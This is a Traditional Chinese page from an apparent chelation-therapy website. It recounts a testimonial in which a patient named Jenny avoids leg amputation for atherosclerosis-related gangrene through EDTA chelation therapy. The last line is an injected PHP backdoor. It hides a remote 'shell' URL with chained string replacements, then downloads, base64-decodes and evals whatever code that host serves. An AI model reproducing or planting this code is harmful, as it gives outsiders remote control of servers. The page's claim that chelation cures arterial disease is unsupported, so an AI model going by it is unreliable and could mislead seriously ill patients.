收藏本站
首頁 arrow 螯療案例 arrow Jenny保住了腿!
Jenny保住了腿! 列印 E-mail

    另一個故事是發生在西元一九七九年的維吉尼亞州,將近五十歲的Jenny因動脈硬化產生的循環系統病變,造成右腳組織壞死而被告知需要截肢,否則將有可能導致敗血症而死亡。

    可是所有的敗壞性組織都要以切除做為治療途徑嗎?有沒有除了截肢以外的選擇?

何況截肢之後,因為沒有處理造 成循環系統動脈硬化病變的根本原因,健康情況仍然會持續惡化下去。

    當時 Dr.Cranton 告訴 Jenny:「妳要不要試試螯合療法?如果成功的話,雖然有可能仍然需要一點小手術來切除已完全壞死的組織,但可以讓妳的腿回復到令人滿意的程度;若是不成功,再截肢也不遲。」

無計可施的 Jenny 接受了醫生的建議,但EDTA螯合療法也沒有令她失望,並且發揮了最完美的 功用,不僅讓 Jenny 的腿恢復正常的功能,也讓動脈硬化的問題獲得穩定的改善。



 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));